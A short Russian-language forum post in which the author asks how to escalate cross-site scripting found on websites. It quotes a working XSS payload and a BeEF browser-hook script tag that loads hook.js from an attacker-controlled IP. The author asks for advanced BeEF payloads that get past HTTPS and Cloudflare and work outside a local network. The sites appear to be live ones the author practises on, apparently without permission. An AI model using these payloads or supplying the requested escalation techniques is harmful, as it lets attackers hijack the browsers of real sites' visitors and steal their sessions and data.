Доброго времени суток. Находить xss на сайтах не проблема и пейлоады получаються примерно такие "/</h1>/</form>/<script>confirm(document.domain)</script>// пейлоад исполняемый но как раскрутить в дальнейшем задаюсь вопросом, на некоторых говно сайтах которые я использую для практики, обычный beef пейлоад <script src="http://<IP>:3000/hook.js"></script> исполняеться, а сайты на https а еще и за cloudflare beef не принимают но xss имеют, подскажите пожалуйста как раскручивать xss или подскажите где подсмотреть advanced xss пейлоады с использованием beef. Так же обясните если не сложно как можно инджектить через beef-xss не в локальной сети. Зарание спасибо, как-то пропустил эту тему, практиковал сам xss для свободного понимания
.
.